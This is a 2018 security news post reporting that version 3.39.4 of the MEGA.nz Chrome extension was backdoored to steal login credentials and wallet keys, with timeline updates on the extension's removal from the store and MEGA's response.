The MEGA.nz Chrome Browser Extension Has Been Backdoored (UPDATE)
The MEGA.nz Chrome Extension has been identified as backdoored in the newest version. It is stealing credentials for several services like GitHub and Google, which will be sent to an external website.
Starting with a Reddit thread - just about two hours ago at the moment of writing this - on the /r/Monero subreddit, the MEGA.nz Chrome Browser Extension has been identified as backdoored in the newest version 3.39.4. It is stealing credentials for several services like GitHub and Google, which will be sent to an external website. Note: This story will be updated to keep you up to date.
Discovery
Reddit user gattacus updated the MEGA.nz extension in his browser, when the extension asked for additional permissions, which made him analyzing the changes in the source code. What he found was a backdoor trying to steal users Monero. The fact that there was no recent commit on the public Git repository on GitHub could mean that MEGAs account on the Google Webstore for Chrome has been hacked or an authorized user (i.e. an insider) pushed the backdoored version to the store.
Affected Services
Shortly after, other researchers like SerHack started investigating this incident, which revealed several other services being affected by this backdoor.
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!
— SerHack (@serhack_) September 4, 2018
LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.
Version: 3.39.4
It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz pic.twitter.com/TnPalqj1cz
Currently known credentials being snatched:
- Amazon
- GitHub
- Microsoft
- MyMonero
- MyEtherWallet
- Aurora
The extension is not only going for login data, but for wallet private keys.
If you are using the Firefox extension, you are currently not affected by this, as you are still on version 3.39.3.
The Attack Server
All the data will be sent to hxxxs://www.megaopac dot host/ pic.twitter.com/J0BktnWVvW
— SerHack (@serhack_) September 4, 2018
Collected credentials will be sent to megaopac.host, which has been registered via Namecheap on the 31.08.2018. The JavaScript code is posting a request via XHR to the webserver. Parameter d probably contains an internal ID, where 3 stands for GitHub and so on. The p1 parameter contains the username and p2 holds the login password.
Takeaway
This incident serves to highlight the risk that third party plugins pose to a robust security posture. It is not yet known if MEGA have been compromised, or if rogue internal elements are behind this backdoor. A lesson everyone can learn from this is thinking twice about the permissions we grant an extension or anything related. They often ask for way more than they actually need. Also - even though it remains unclear how the attacker backdoored the release - employees should be trained for company login best practices and shown how to identify phishing.
At the time of writing this, this is everything that has been revealed. There has been no public statement from Mega yet. Shoutout for the great work by the researchers involved, which were also mentioned above.
UPDATE 04.09.2018 19:32 GMT
The browser extension has been removed from the Google Webstore.
Update 05.09.2018 15:55 GMT
MEGA released a statement on their blog. They confirmed the information released by researchers and are actively investigating the compromise of their Google Webstore account. Additionally, they gave an insight into why the attacker was able to push code as an release on the store. Google started to disallow publisher signatures, which was an important countermeasure to make sure the code is in fact coming from an authorized party.
